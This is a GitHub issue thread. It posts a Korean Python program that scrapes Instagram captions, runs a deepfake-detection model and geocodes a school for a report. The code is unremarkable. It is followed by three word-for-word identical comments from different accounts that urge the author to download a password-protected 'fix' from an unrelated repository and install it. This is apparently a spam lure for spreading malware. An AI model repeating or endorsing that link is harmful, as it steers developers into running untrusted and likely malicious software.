### ISSUE TITLE
딥페이크 찾는 프로그램(수정 요구)

### ISSUE THREAD

**Issue by jyNyam** [jyNyam/Nyam#1]
import os
from dotenv import load_dotenv
import instaloader
from instaloader import Profile
import cv2
import numpy as np
from tensorflow.keras.models import load_model
import requests

# .env 파일에서 환경 변수 로드
load_dotenv()

# 환경 변수에서 API 키와 모델 경로를 가져옵니다.
api_key = os.getenv('GOOGLE_MAPS_API_KEY')
model_path = os.getenv('MODEL_PATH')

# 인스타그램 데이터 수집
def scrape_instagram_profile(username):
    L = instaloader.Instaloader()
    try:
        profile = Profile.from_username(L.context, username)
        posts = profile.get_posts()
        for post in posts:
            caption = post.caption
            if caption and "deepfake" in caption.lower():
                return caption
    except Exception as e:
        print(f"Error accessing Instagram profile: {e}")
    return None

# 딥페이크 탐지
def load_deepfake_model(model_path):
    try:
        model = load_model(model_path)
        return model
    except Exception as e:
        print(f"Error loading model: {e}")
        return None

def is_deepfake(image_path, model):
    try:
        image = cv2.imread(image_path)
        image = cv2.resize(image, (299, 299))
        image = np.expand_dims(image, axis=0)
        prediction = model.predict(image)
        return prediction[0][0] > 0.5
    except Exception as e:
        print(f"Error in deepfake detection: {e}")
        return False

# 학교 위치 식별 및 시각화
def get_school_location(school_name, api_key):
    try:
        url = f"https://maps.googleapis.com/maps/api/geocode/json?address={school_name}&key={api_key}"
        response = requests.get(url)
        location_data = response.json()
        
        if location_data['status'] == 'OK':
            location = location_data['results'][0]['geometry']['location']
            return location['lat'], location['lng']
    except Exception as e:
        print(f"Error retrieving school location: {e}")
    
    return None

# 보고서 생성
def generate_report(school_name, location, is_deepfake):
    try:
        report = f"학교 이름: {school_name}\n"
        report += f"위치: 위도 {location[0]}, 경도 {location[1]}\n"
        report += f"딥페이크 탐지 결과: {'Yes' if is_deepfake else 'No'}\n"
        
        with open(f'report_{school_name}.txt', 'w') as f:
            f.write(report)
    except Exception as e:
        print(f"Error generating report: {e}")

# 프로그램 통합 및 실행
def main():
    # 인스타그램 데이터 수집
    username = 'instagram_username'
    data = scrape_instagram_profile(username)
    
    if data:
        print("딥페이크 관련 데이터가 발견되었습니다.")
        
        # 딥페이크 탐지
        model = load_deepfake_model(model_path)
        if model:
            image_path = 'path/to/image.jpg'
            is_deepfake_result = is_deepfake(image_path, model)
        
            # 학교 위치 파악
            school_name = 'Seoul National University'
            location = get_school_location(school_name, api_key)
            
            if location:
                # 보고서 생성
                generate_report(school_name, location, is_deepfake_result)
                print("보고서가 생성되었습니다.")
            else:
                print("학교 위치를 찾을 수 없습니다.")
        else:
            print("딥페이크 탐지 모델 로드에 실패했습니다.")
    else:
        print("딥페이크 관련 데이터가 없습니다.")

if __name__ == '__main__':
    main()

**Comment by Jostino** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/aravinda-gamage/x86_64-win64-ranlib/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Amrithesh-k** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/aravinda-gamage/x86_64-win64-ranlib/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by telfaw** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/aravinda-gamage/x86_64-win64-ranlib/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
